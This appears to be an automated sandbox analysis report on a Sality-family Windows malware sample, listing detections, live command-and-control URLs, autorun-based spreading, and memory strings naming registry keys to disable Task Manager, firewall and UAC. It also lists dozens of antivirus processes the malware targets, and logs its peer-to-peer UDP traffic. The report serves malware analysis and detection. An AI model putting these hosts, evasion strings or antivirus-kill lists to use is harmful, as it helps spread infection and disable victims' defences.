Source: http://46.105.103.219/sobakavolos.gif?d0255c4e=-1325038046 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?247d6b5=76524906 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?8756340a=-1778213858 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?c1fee9b0=267865472 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?ee5adceb=1926686552 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390d | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?d7244def=-503438967 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?590aff39=-1307181454 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$ | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?d42c48fe=-1470590468 | Avira URL Cloud: Label: malware
Source: http://kukutrustnet987.info/home.gif | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?2e864a2=146353638c | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?c535894d=349578548 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?e7c0a656=226918236 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?7ccb59f9=1986137579 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$W | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360z | Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware | Avira URL Cloud: Label: phishing
Source: http://46.105.103.219/sobakavolos.gif?eaf3a57c=-2118786840 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?7e81b91=530607684 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\odnhm.exe | Avira: detection malicious, Label: W32/Sality.AT
Source: C:\clmaq.pif | Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Users\user\AppData\Local\Temp\rkuso.exe | Avira: detection malicious, Label: W32/Sality.AT
Source: RHxJqGoGFB.exe | ReversingLabs: Detection: 94%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\odnhm.exe | Joe Sandbox ML: detected
Source: C:\clmaq.pif | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rkuso.exe | Joe Sandbox ML: detected
Source: RHxJqGoGFB.exe | Joe Sandbox ML: detected
Source: RHxJqGoGFB.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Spreading

Source: Yara match | File source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: Process Memory Space: RHxJqGoGFB.exe PID: 7300, type: MEMORYSTR
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File created: C:\autorun.inf
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: z:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: y:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: x:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: w:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: v:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: u:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: t:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: s:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: r:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: q:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: p:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: o:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: n:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: m:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: l:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: k:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: j:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: i:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: h:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: g:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: f:
Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File opened: e:
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: c:
Source: RHxJqGoGFB.exe | Binary or memory string: [AutoRun]
Source: RHxJqGoGFB.exe | Binary or memory string: autorun.inf
Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: [AutoRun]
Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! 
Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
        Source: RHxJqGoGFB.exe, 00000000.00000002.4304663842.00000000045FC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: RHxJqGoGFB.exe, 00000000.00000002.4304663842.00000000045FC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: N[autorun]
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008FA2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_008FA2F5
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_00901060
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCacheJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior

        Networking

        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49749 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49742 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49737 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49748 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49735 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49786 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49745 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49746 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49752 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49747 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49797 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49819 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49732 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49774 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49846 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49750 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49868 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49891 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49880 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49808 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49914 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49857 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49902 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49759 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49951 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49834 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49984 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49925 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50045 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50054 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49940 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50047 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50043 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50053 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50052 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49973 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49962 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50042 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50050 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50046 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:49995 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50049 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50019 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50051 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50044 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50006 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50032 -> 46.105.103.219:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.4:50048 -> 46.105.103.219:80
        Source: unknown | Network traffic detected: IP country count 27
        Source: global traffic | UDP traffic: 192.168.2.4:53231 -> 94.76.206.19:1473
        Source: global traffic | UDP traffic: 192.168.2.4:53232 -> 89.122.185.62:7046
        Source: global traffic | UDP traffic: 192.168.2.4:53233 -> 188.241.130.50:5164
        Source: global traffic | UDP traffic: 192.168.2.4:53234 -> 186.211.10.235:7620
        Source: global traffic | UDP traffic: 192.168.2.4:53235 -> 179.184.169.171:7368
        Source: global traffic | UDP traffic: 192.168.2.4:53236 -> 84.108.73.183:4138
        Source: global traffic | UDP traffic: 192.168.2.4:53237 -> 188.240.66.34:5812
        Source: global traffic | UDP traffic: 192.168.2.4:49293 -> 190.73.34.36:4980
        Source: global traffic | UDP traffic: 192.168.2.4:57323 -> 93.114.144.199:4310
        Source: global traffic | UDP traffic: 192.168.2.4:57324 -> 122.168.100.182:6900
        Source: global traffic | UDP traffic: 192.168.2.4:57874 -> 98.126.7.202:4700
        Source: global traffic | UDP traffic: 192.168.2.4:57875 -> 202.56.221.5:4800
        Source: global traffic | UDP traffic: 192.168.2.4:57876 -> 188.241.239.210:7451
        Source: global traffic | UDP traffic: 192.168.2.4:57877 -> 187.6.136.20:6870
        Source: global traffic | UDP traffic: 192.168.2.4:52164 -> 113.161.12.199:7866
        Source: global traffic | UDP traffic: 192.168.2.4:52165 -> 203.146.109.163:5060
        Source: global traffic | UDP traffic: 192.168.2.4:61244 -> 92.87.229.20:5350
        Source: global traffic | UDP traffic: 192.168.2.4:61245 -> 59.161.19.29:7036
        Source: global traffic | UDP traffic: 192.168.2.4:61246 -> 190.207.236.217:4717
        Source: global traffic | UDP traffic: 192.168.2.4:61247 -> 188.214.36.212:6511
        Source: global traffic | UDP traffic: 192.168.2.4:61248 -> 180.151.8.178:5140
        Source: global traffic | UDP traffic: 192.168.2.4:49190 -> 177.11.161.29:8542
        Source: global traffic | UDP traffic: 192.168.2.4:49191 -> 202.43.114.170:6822
        Source: global traffic | UDP traffic: 192.168.2.4:49192 -> 191.37.199.39:7866
        Source: global traffic | UDP traffic: 192.168.2.4:59644 -> 181.44.61.173:6787
        Source: global traffic | UDP traffic: 192.168.2.4:59645 -> 118.102.149.168:6856
        Source: global traffic | UDP traffic: 192.168.2.4:59646 -> 86.100.45.216:4664
        Source: global traffic | UDP traffic: 192.168.2.4:55661 -> 39.1.15.172:5616
        Source: global traffic | UDP traffic: 192.168.2.4:55662 -> 220.130.154.247:8030
        Source: global traffic | UDP traffic: 192.168.2.4:55663 -> 113.11.62.14:6910
        Source: global traffic | UDP traffic: 192.168.2.4:55664 -> 203.147.91.179:6373
        Source: global traffic | UDP traffic: 192.168.2.4:55665 -> 115.78.135.71:6912
        Source: global traffic | UDP traffic: 192.168.2.4:63268 -> 31.211.133.88:4664
        Source: global traffic | UDP traffic: 192.168.2.4:63269 -> 89.37.188.218:7456
        Source: global traffic | UDP traffic: 192.168.2.4:63270 -> 41.38.34.12:6142
        Source: global traffic | UDP traffic: 192.168.2.4:63017 -> 177.22.43.78:7933
        Source: global traffic | UDP traffic: 192.168.2.4:63018 -> 86.106.240.47:5372
        Source: global traffic | UDP traffic: 192.168.2.4:63019 -> 150.165.220.74:6172
        Source: global traffic | UDP traffic: 192.168.2.4:63020 -> 86.104.74.51:6364
        Source: global traffic | UDP traffic: 192.168.2.4:63021 -> 27.106.75.127:6286
        Source: global traffic | UDP traffic: 192.168.2.4:56864 -> 118.69.54.5:6235
        Source: global traffic | UDP traffic: 192.168.2.4:56865 -> 190.206.225.183:9674
        Source: global traffic | UDP traffic: 192.168.2.4:55477 -> 90.179.53.86:9675
        Source: global traffic | UDP traffic: 192.168.2.4:55478 -> 113.162.238.152:7700
        Source: global traffic | UDP traffic: 192.168.2.4:55479 -> 79.126.164.67:7143
        Source: global traffic | UDP traffic: 192.168.2.4:55480 -> 202.134.163.88:4343
        Source: global traffic | UDP traffic: 192.168.2.4:55481 -> 27.48.201.2:5812
        Source: global traffic | UDP traffic: 192.168.2.4:55482 -> 187.40.170.3:6621
        Source: global traffic | UDP traffic: 192.168.2.4:57575 -> 202.40.190.14:4993
        Source: global traffic | UDP traffic: 192.168.2.4:57576 -> 191.43.4.101:7940
        Source: global traffic | UDP traffic: 192.168.2.4:57577 -> 5.204.242.202:6976
        Source: global traffic | UDP traffic: 192.168.2.4:52244 -> 41.77.183.102:5415
        Source: global traffic | UDP traffic: 192.168.2.4:52245 -> 175.102.10.34:5777
        Source: global traffic | UDP traffic: 192.168.2.4:52246 -> 123.27.55.144:6130
        Source: global traffic | UDP traffic: 192.168.2.4:52247 -> 94.156.127.59:7948
        Source: global traffic | UDP traffic: 192.168.2.4:52248 -> 200.205.47.222:5078
        Source: global traffic | UDP traffic: 192.168.2.4:53804 -> 114.41.80.242:5092
        Source: global traffic | UDP traffic: 192.168.2.4:53805 -> 92.87.163.40:6755
        Source: global traffic | UDP traffic: 192.168.2.4:53806 -> 189.45.44.210:6018
        Source: global traffic | UDP traffic: 192.168.2.4:50247 -> 23.92.221.54:5188
        Source: global traffic | UDP traffic: 192.168.2.4:50248 -> 59.93.199.71:6755
        Source: global traffic | UDP traffic: 192.168.2.4:50249 -> 119.189.3.27:5335
        Source: global traffic | UDP traffic: 192.168.2.4:50250 -> 122.168.100.184:7119
        Source: global traffic | UDP traffic: 192.168.2.4:50251 -> 180.218.251.35:5415
        Source: global traffic | UDP traffic: 192.168.2.4:51946 -> 115.254.32.245:4980
        Source: global traffic | UDP traffic: 192.168.2.4:51947 -> 37.142.67.58:6373
        Source: global traffic | UDP traffic: 192.168.2.4:51948 -> 113.161.196.135:4879
        Source: global traffic | UDP traffic: 192.168.2.4:59344 -> 123.30.169.88:6500
        Source: global traffic | UDP traffic: 192.168.2.4:59345 -> 61.135.18.66:5890
        Source: global traffic | UDP traffic: 192.168.2.4:59346 -> 190.37.87.100:7411
        Source: global traffic | UDP traffic: 192.168.2.4:59347 -> 123.27.31.5:7119
        Source: global traffic | UDP traffic: 192.168.2.4:59348 -> 190.204.201.41:6195
        Source: global traffic | UDP traffic: 192.168.2.4:49690 -> 183.83.206.61:7119
        Source: global traffic | UDP traffic: 192.168.2.4:49691 -> 41.186.11.53:4245
        Source: global traffic | UDP traffic: 192.168.2.4:49332 -> 189.13.99.195:8180
        Source: global traffic | UDP traffic: 192.168.2.4:49333 -> 122.100.99.156:5415
        Source: global traffic | UDP traffic: 192.168.2.4:49334 -> 117.196.243.174:4756
        Source: global traffic | UDP traffic: 192.168.2.4:49335 -> 118.69.52.216:8198
        Source: global traffic | UDP traffic: 192.168.2.4:49336 -> 59.9.134.51:6989
        Source: global traffic | UDP traffic: 192.168.2.4:49337 -> 200.8.30.163:6511
        Source: global traffic | UDP traffic: 192.168.2.4:52919 -> 178.211.97.155:6910
        Source: global traffic | UDP traffic: 192.168.2.4:52920 -> 189.13.136.81:7620
        Source: global traffic | UDP traffic: 192.168.2.4:55662 -> 210.66.249.227:6755
        Source: global traffic | UDP traffic: 192.168.2.4:55663 -> 86.106.240.116:6142
        Source: global traffic | UDP traffic: 192.168.2.4:55664 -> 189.25.10.24:7990
        Source: global traffic | UDP traffic: 192.168.2.4:55665 -> 78.187.175.231:7866
        Source: global traffic | UDP traffic: 192.168.2.4:55666 -> 110.78.163.76:6822
        Source: global traffic | UDP traffic: 192.168.2.4:55667 -> 190.36.155.238:5380
        Source: global traffic | UDP traffic: 192.168.2.4:65235 -> 190.147.184.75:6455
        Source: global traffic | UDP traffic: 192.168.2.4:55503 -> 118.69.244.25:8455
        Source: global traffic | UDP traffic: 192.168.2.4:55504 -> 59.127.110.115:44848
        Source: global traffic | UDP traffic: 192.168.2.4:55505 -> 179.212.232.131:4588
        Source: global traffic | UDP traffic: 192.168.2.4:55506 -> 112.78.3.138:8281
        Source: global traffic | UDP traffic: 192.168.2.4:55507 -> 130.204.120.42:5549
        Source: global traffic | UDP traffic: 192.168.2.4:55508 -> 113.160.133.171:7768
        Source: global traffic | UDP traffic: 192.168.2.4:55509 -> 202.59.129.35:4245
        Source: global traffic | UDP traffic: 192.168.2.4:51019 -> 203.177.71.171:5584
        Source: global traffic | UDP traffic: 192.168.2.4:57864 -> 93.157.193.78:4440
        Source: global traffic | UDP traffic: 192.168.2.4:57865 -> 92.87.229.53:6130
        Source: global traffic | UDP traffic: 192.168.2.4:57866 -> 177.70.129.10:6636
        Source: global traffic | UDP traffic: 192.168.2.4:57867 -> 190.206.122.109:5480
        Source: global traffic | UDP traffic: 192.168.2.4:57868 -> 186.94.161.129:5415
        Source: global traffic | UDP traffic: 192.168.2.4:57869 -> 41.103.106.172:6373
        Source: global traffic | UDP traffic: 192.168.2.4:57870 -> 190.147.4.186:4717
        Source: global traffic | UDP traffic: 192.168.2.4:59466 -> 113.171.248.2:6538
        Source: global traffic | UDP traffic: 192.168.2.4:59467 -> 91.244.214.41:5540
        Source: global traffic | UDP traffic: 192.168.2.4:56604 -> 201.211.227.242:5380
        Source: global traffic | UDP traffic: 192.168.2.4:56605 -> 177.9.220.111:6554
        Source: global traffic | UDP traffic: 192.168.2.4:56606 -> 186.89.27.138:7150
        Source: global traffic | UDP traffic: 192.168.2.4:56607 -> 177.125.164.144:8032
        Source: global traffic | UDP traffic: 192.168.2.4:56608 -> 109.160.120.6:4588
        Source: global traffic | UDP traffic: 192.168.2.4:56609 -> 186.233.253.245:6304
        Source: global traffic | UDP traffic: 192.168.2.4:49333 -> 178.54.140.104:4324
